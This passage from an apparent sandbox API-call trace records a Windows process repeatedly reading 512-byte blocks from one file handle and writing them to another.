lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.220] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.220] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.221] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.222] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.223] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.225] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.226] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.226] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.227] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.227] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.228] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.228] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.229] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.229] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.231] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.231] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.232] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.232] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.233] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.234] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.234] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.235] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.236] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.236] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.237] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.237] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.238] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.239] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.240] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.240] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.241] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.241] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.242] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.243] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.243] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.244] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.244] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.246] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.246] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.247] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.248] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.249] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.250] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.251] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.251] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.252] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.253] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.253] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.254] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.255] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.256] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.256] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.257] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.258] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.259] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.260] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.261] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.261] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.263] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.265] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.266] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.266] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.267] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.268] ReadFile (in: 